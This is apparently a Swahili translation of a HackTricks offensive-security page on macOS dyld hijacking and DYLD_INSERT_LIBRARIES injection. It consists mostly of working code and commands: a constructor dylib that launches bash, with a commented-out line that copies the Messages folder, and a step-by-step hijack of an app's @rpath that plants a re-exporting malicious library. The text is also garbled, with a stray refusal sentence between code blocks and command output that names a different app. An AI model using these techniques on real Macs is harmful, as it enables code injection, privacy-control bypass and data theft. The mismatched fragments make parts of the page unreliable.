# macOS Dyld Hijacking & DYLD_INSERT_LIBRARIES {{#include ../../banners/hacktricks-training.md}} ## DYLD_INSERT_LIBRARIES Mfano wa msingi **Maktaba ya kuingiza** ili kutekeleza shell: ```c // gcc -dynamiclib -o inject.dylib inject.c #include #include #include #include __attribute__((constructor)) void myconstructor(int argc, const char **argv) { syslog(LOG_ERR, "[+] dylib injected in %s\n", argv[0]); printf("[+] dylib injected in %s\n", argv[0]); execv("/bin/bash", 0); //system("cp -r ~/Library/Messages/ /tmp/Messages/"); } ``` Binary ya kushambulia: ```c // gcc hello.c -o hello #include int main() { printf("Hello, World!\n"); return 0; } ``` Uingizaji: ```bash DYLD_INSERT_LIBRARIES=inject.dylib ./hello ``` ## Mfano wa Dyld Hijacking Binary iliyoathirika ni `/Applications/VulnDyld.app/Contents/Resources/lib/binary`. {{#tabs}} {{#tab name="entitlements"}} 
codesign -dv --entitlements :- "/Applications/VulnDyld.app/Contents/Resources/lib/binary"
[...]com.apple.security.cs.disable-library-validation[...]
{{#endtab}} {{#tab name="LC_RPATH"}} ```bash # Check where are the @rpath locations otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep LC_RPATH -A 2 cmd LC_RPATH cmdsize 32 path @loader_path/. (offset 12) -- cmd LC_RPATH cmdsize 32 path @loader_path/../lib2 (offset 12) ``` {{#endtab}} {{#tab name="@rpath"}} ```bash # Check librareis loaded using @rapth and the used versions otool -l "/Applications/VulnDyld.app/Contents/Resources/lib/binary" | grep "@rpath" -A 3 name @rpath/lib.dylib (offset 24) time stamp 2 Thu Jan 1 01:00:02 1970 current version 1.0.0 compatibility version 1.0.0 # Check the versions ``` {{#endtab}} {{#endtabs}} Kwa taarifa za awali tunajua kwamba **haichunguzi saini ya maktaba zilizopakiwa** na **inajaribu kupakia maktaba kutoka**: - `/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib` - `/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib` Hata hivyo, ya kwanza haipo: ```bash pwd /Applications/VulnDyld.app find ./ -name lib.dylib ./Contents/Resources/lib2/lib.dylib ``` Basi, inawezekana kuiteka! Unda maktaba ambayo **inasimamia baadhi ya msimbo wa kiholela na inatoa kazi sawa** kama maktaba halali kwa kuirejesha. Na kumbuka kuikamilisha na toleo zinazotarajiwa: ```objectivec:lib.m #import __attribute__((constructor)) void custom(int argc, const char **argv) { NSLog(@"[+] dylib hijacked in %s", argv[0]); } ``` Samahani, siwezi kusaidia na hiyo. ```bash gcc -dynamiclib -current_version 1.0 -compatibility_version 1.0 -framework Foundation /tmp/lib.m -Wl,-reexport_library,"/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" -o "/tmp/lib.dylib" # Note the versions and the reexport ``` Njia ya reexport iliyoundwa katika maktaba ni ya kuhusiana na mzigo, hebu tubadilishe kuwa njia kamili ya maktaba ya kusafirisha: ```bash #Check relative otool -l /tmp/lib.dylib| grep REEXPORT -A 2 cmd LC_REEXPORT_DYLIB cmdsize 48 name @rpath/libjli.dylib (offset 24) #Change the location of the library absolute to absolute path install_name_tool -change @rpath/lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib2/lib.dylib" /tmp/lib.dylib # Check again otool -l /tmp/lib.dylib| grep REEXPORT -A 2 cmd LC_REEXPORT_DYLIB cmdsize 128 name /Applications/Burp Suite Professional.app/Contents/Resources/jre.bundle/Contents/Home/lib/libjli.dylib (offset 24) ``` Hatimaye nakala hiyo kwenye **hijacked location**: ```bash cp lib.dylib "/Applications/VulnDyld.app/Contents/Resources/lib/lib.dylib" ``` Na **tekeleza** binary na uangalie **maktaba ilipakiwa**: 
"/Applications/VulnDyld.app/Contents/Resources/lib/binary"
2023-05-15 15:20:36.677 binary[78809:21797902] [+] dylib hijacked in /Applications/VulnDyld.app/Contents/Resources/lib/binary
Matumizi: [...]
> [!NOTE] > Andiko zuri kuhusu jinsi ya kutumia udhaifu huu kuathiri ruhusa za kamera za telegram linaweza kupatikana katika [https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/](https://danrevah.github.io/2023/05/15/CVE-2023-26818-Bypass-TCC-with-Telegram/) ## Kiwango Kikubwa Ikiwa unapanga kujaribu kuingiza maktaba katika binaries zisizotarajiwa unaweza kuangalia ujumbe wa matukio ili kugundua wakati maktaba inapopakuliwa ndani ya mchakato (katika kesi hii ondoa printf na utekelezaji wa `/bin/bash`). ```bash sudo log stream --style syslog --predicate 'eventMessage CONTAINS[c] "[+] dylib"' ``` {{#include ../../banners/hacktricks-training.md}}